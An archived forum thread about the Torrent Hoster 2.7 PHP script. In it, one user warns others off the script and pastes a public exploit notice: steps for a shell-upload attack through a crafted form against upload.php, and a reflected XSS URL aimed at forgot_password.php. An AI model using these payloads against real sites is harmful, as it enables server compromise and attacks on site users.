Bravo List

Bravo List (http://www.bvlist.com/index.php)
-   Downloads (http://www.bvlist.com/forumdisplay.php?f=16)
-   -   Torrent Hoster 2.7 (http://www.bvlist.com/showthread.php?t=4377)

wMan 31st January 2010 20:35
Torrent Hoster 2.7
 
2 Attachment(s)
:muscle:
all info in readme ...just test it :D

rooban 30th May 2010 08:13
working
 
is this script working???????

daffy 31st May 2010 23:01
yes works

Phogo 1st June 2010 15:26
Wouldn't recommend using it though as it suffers from a Remote Upload Exploit.
PHP Code:
========================================================================================                  
| # Title    : Torrent Hoster Remont Upload Exploit           
| # Author   : El-Kahina                                                                                                                
| # Home     : www.h4kz.com                                                                              |                                                                                                                               
| # Script   : Powered by Torrent Hoster.     
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)       
| # Bug      : Upload    
|                                                                  
======================      Exploit By El-Kahina       =================================
 # Exploit  : 
 
 1 - use tamper data :
 
 http://127.0.0.1/torrenthoster//torrents.php?mode=upload
 
 2- 
    <center>
   Powered by Torrent Hoster
        
        <form enctype="multipart/form-data" action="http://127.0.0.1/torrenthoster/upload.php" id="form" method="post" onsubmit="a=document.getElementById('form').style;a.display='none';b=document.getElementById('part2').style;b.display='inline';" style="display: inline;">
        <strong>���� ��� ����� �� ��:</strong> <?php echo $maxfilesize?>��������

        <input type="file" name="upfile" size="50" />
<input type="submit" value="��� �����" id="upload" />
        </form>
        <div id="part2" style="display: none;">��� ��� ����� .. �� ���� �����</div>
        </center>
        
3 - http://127.0.0.1/torrenthoster/torrents/  (to find shell)      
        
4 - Xss:

http://127.0.0.1/torrenthoster/users/forgot_password.php/>"><ScRiPt>alert(00213771818860)</ScRiPt>

sme1 9th September 2011 00:26
Help ..
 
but can not log into admin!
You say I have permission to access Do Not this file!

Can you help me?

:sos:


All times are GMT +2. The time now is 09:59.

Powered by vBulletin® Version 3.8.11 Beta 3
Copyright ©2000 - 2024, vBulletin Solutions Inc.